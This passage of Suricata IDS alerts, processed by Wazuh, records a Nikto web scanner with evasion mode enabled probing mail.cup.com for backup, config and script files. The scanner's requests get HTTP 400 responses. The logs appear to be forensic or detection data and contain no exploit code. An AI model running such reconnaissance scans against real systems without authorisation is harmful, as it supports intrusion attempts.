character","id":"86601","firedtimes":52,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.84559","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.504875+0000\",\"flow_id\":565587047264595,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47040,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.asa\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.504875+0000","flow_id":"565587047264595.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47040","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.asa","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.506877+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":53,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.86095","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.506877+0000\",\"flow_id\":1776793594542443,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47042,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.PRINT\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.506877+0000","flow_id":"1776793594542443.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47042","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.PRINT","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.509502+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":54,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.87637","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.509502+0000\",\"flow_id\":43357678780300,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47044,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.inc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.509502+0000","flow_id":"43357678780300.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47044","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.inc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.511939+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":55,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.89171","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.511939+0000\",\"flow_id\":111342716111856,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47046,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ee\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.511939+0000","flow_id":"111342716111856.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47046","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ee","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.522439+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":56,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.90705","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.522439+0000\",\"flow_id\":22535677342666,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47048,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.gif\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.522439+0000","flow_id":"22535677342666.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47048","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.gif","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.525182+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":57,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.92239","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.525182+0000\",\"flow_id\":1801949218013082,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47050,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.tmp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.525182+0000","flow_id":"1801949218013082.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47050","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.tmp","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.527247+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":58,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.93777","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.527247+0000\",\"flow_id\":46888141850715,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47052,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.CGI\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.527247+0000","flow_id":"46888141850715.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47052","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.CGI","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.529238+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":59,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.95311","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.529238+0000\",\"flow_id\":314112417075197,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47054,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ASP\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.529238+0000","flow_id":"314112417075197.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47054","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ASP","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.531898+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":60,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.96847","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.531898+0000\",\"flow_id\":484214596835423,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47056,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cnf\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.531898+0000","flow_id":"484214596835423.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47056","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cnf","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.534133+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":61,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.98383","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.534133+0000\",\"flow_id\":987915476410983,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47058,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.config~\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.534133+0000","flow_id":"987915476410983.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47058","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.config~","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.536596+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":62,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.99927","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.536596+0000\",\"flow_id\":830771212987548,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47060,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.vts\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.536596+0000","flow_id":"830771212987548.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47060","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.vts","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.538865+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":63,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.101463","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.538865+0000\",\"flow_id\":2145323263342098,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47062,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.bak\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.538865+0000","flow_id":"2145323263342098.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47062","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.bak","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.541676+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":64,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.103002","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.541676+0000\",\"flow_id\":2236672922763369,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47064,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.se\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.541676+0000","flow_id":"2236672922763369.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47064","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.se","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.543712+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":65,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.104539","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.543712+0000\",\"flow_id\":2.23652689387752e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47066,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.js\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.543712+0000","flow_id":"2236526893877520.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47066","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.js","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.546419+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":66,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.106080","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.546419+0000\",\"flow_id\":565934939591600,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47068,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.pl\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.546419+0000","flow_id":"565934939591600.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47068","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.pl","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.549896+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":67,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.107615","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.549896+0000\",\"flow_id\":203104692363407,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47070,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.iso2022-jp\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
